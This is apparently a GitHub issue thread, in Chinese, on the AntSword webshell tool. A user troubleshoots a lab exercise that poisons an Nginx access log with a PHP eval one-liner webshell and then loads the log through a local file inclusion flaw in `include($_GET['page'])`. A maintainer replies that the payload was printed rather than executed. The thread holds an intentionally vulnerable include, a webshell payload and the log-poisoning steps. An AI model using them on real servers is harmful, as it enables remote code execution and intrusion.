### ISSUE TITLE
编码器选择default的时候连接的时候乱码且不能执行命令

### ISSUE THREAD

**Issue by klmyssn** [AntSwordProject/antSword#248]
- [ ] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
- [ ] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
- [ ] 我已经阅读过蚁剑的开发文档，并且尝试过自己通过Google等方式解决问题
- [ ] 这是一个新功能的建议
- [ ] 我查阅了文档没找到解决方案，所以来询问如何使用蚁剑

---

## 报告 Bug

- [ ] 我使用的操作系统是 ***Windows*** 7

---
- [ ] 我使用的是 64 位操作系统

### Bug 详细描述
 靶机环境：Windows NT SSN-PC 6.1 build 7601（win7 x64） PHP版本5.2.17 Nginx1.15.11
LFI-1
考点：包含日志获取webshell
源码：
<?php
include($_GET["page"]);
?>
分析:
    假设我们通过各种方式知道了日志文件的路径为：C:\phpstudy_pro\Extensions\Nginx1.15.11\logs\lfi.sec_acess.log
然后我们可以通过burp抓包然后在请求处插入一句话木马，然后再利用文件包含漏洞拿webshell了。
文件包含：/?page=C:\phpstudy_pro\Extensions\Nginx1.15.11\logs\lfi.sec_acess.log
坑一：
    我插入的一句话木马为：
<?php eval($_POST["ssn"]); ?>
    结果发现链接失败，报错信息为：
Parse error: syntax error, unexpected T_STRING, expecting ']' in C:\phpstudy_pro\Extensions\Nginx1.15.11\logs\lfi.sec_acess.log on line 294
        我就去靶机的日志文件打开看，这294行就是我插入一句话的日志，结果发现变成了这样
10.80.2.2 - - [18/Mar/2020:20:17:59 +0800] "GET /LFI-1/<?php eval($_POST[\x22ssn\x22]); ?> HTTP/1.1" 500 2590 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
    发现我的一句话木马的“”双引号变成了\x22，我查了下，原来这是因为：这个好像是nginx故意这样做的。
    因为Nginx默认的log_format使用双引号作为间隔符，为了避免日志分析时候出现混乱，所以将双引号解析为x22了。
    那我就寻思我直接去掉双引号或者换成单引号插入好了（这里需要再去手动删除下之前插坏的一句话，不然插了好的也连不上），试了下倒是可以连接了，结果蚁剑连接乱码？也不能正常回显执行的命令：
    解决方案：1.蚁剑连接的时候，编码器选择base64就行了。 2.换中国菜刀（v2016）连接。
    存在疑惑：这是为啥呢，咋还能和编码器相关了。我这时又把分别在LFI-1目录和日志文件目录生成了内容相同的一句话然后用文件包含漏洞用蚁剑去连接，编码器都是default，都可以连接成功，那就很奇怪了，难不成问题是因为log文件吗？
   
![image](https://user-images.githubusercontent.com/37890522/76967117-ed2b3f00-6961-11ea-878e-3d25e0c683f5.png)
![image](https://user-images.githubusercontent.com/37890522/76967166-ffa57880-6961-11ea-8002-51fefb6a3c3b.png)

---

**Comment by Medicean** [comment]
1. 你得知道什么叫「乱码」。截图里的不是乱码。
2.上述图中显示的内容是因为网站将 payload 直接打印了出来，代码并未执行
3.default 和 base64 编码器有什么区别，网上搜一下就出来了，在之前的 issue 中也提到过很多次了，你搜索一下就行了
4.如果想深入排查，建议用 BurpSuite 抓包，你就会明白了。

**Comment by klmyssn** [comment]
好的~我清楚啦，谢谢！！
